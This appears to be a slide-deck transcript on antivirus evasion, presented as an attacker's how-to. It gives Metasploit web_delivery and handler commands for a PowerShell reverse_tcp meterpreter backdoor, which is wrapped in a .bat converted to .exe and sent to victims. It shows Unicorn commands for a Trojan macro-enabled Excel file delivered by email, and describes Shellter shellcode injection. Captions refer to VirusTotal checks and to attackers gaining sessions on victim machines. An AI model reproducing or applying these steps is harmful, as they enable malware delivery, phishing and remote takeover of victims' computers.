This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.

1. Raghav Bisht
Latest Techniquesfor Evading Antivirusand Firewalls.
AntiVirus Evasion

2. 2 | P a g e
A. Power Shell Exploitation
1. Technique : Generating Executables (.exe & .bat) Files
Description:
Attacker create a windows executable (.exe) program which acts as a Trojan. In this technique
attacker generate a power shell command whose work is to create a webclient & embed the
backdoor inside his executable program.
How :
 Attacker use Metasploit framework to generate power shell command.
 use exploit/multi/script/web_delivery
 show targets
 set target 2
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <IP>
 set SRVHOST <Server IP>
 set URIPATH /
 exploit
 After creating the link attackers only task is to run the command on victim computer so, for
doing that attacker will create a batch file Eg. Notepad.bat
 In Notepad.bat attacker write his code& embed the Evil Power Shell Command.
 Convert the .bat file to .exe & send to victim
Result :
Figure 1. Generating PowerShell Command

3. 3 | P a g e
Figure 2. Embedding & Conversion of backdoor to .exe
Figure 3. Virus Total Result For Both Files

4. 4 | P a g e
Figure 4. Victim Executing The Program
Figure 5. Attacker Getting Sessions

5. 5 | P a g e
B. Macros
1. Technique : Generating Macros Enable (.xlsm) Files
Description:
Attacker creates a encoded payload using tool name Unicorn and use that payload to generate a
macro enable Microsoft excel file which acts as a Trojan.
How :
 Download & install Unicorn
 git clone https://github.com/trustedsec/unicorn.git
 cd unicorn
 python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro
 Attacker use Metasploit framework & start handler Exploit.
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <IP>
 set PORT <PORT>
 exploit
 Now use the generated payload and create micro enable excel file
Result :
Figure 6. Generate Payload with unicorn

6. 6 | P a g e
Figure 7. Attacker Machine Start Handler
Figure 8. Create a micro enable excel file with evil code

7. 7 | P a g e
Figure 9. Virus Total Result
Figure 10. Attaching Trojan With Email

8. 8 | P a g e
Figure 11. Send Trojan With Email On Different Email Vendors
Figure 12. Victim AV Bypass

9. 9 | P a g e
Figure 13. Victim Opens The File
Figure 14. Attacker Sessions

10. 10 | P a g e
C. Shellter Project
1. Technique : Shellcode injection tool
Description:
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit
applications only).
The shellcode can be something yours or something generated through a framework, such as
Metasploit.
Result :
Figure 15

11. 11 | P a g e
Figure 16

12. 12 | P a g e
Figure 17

13. 13 | P a g e
Figure 18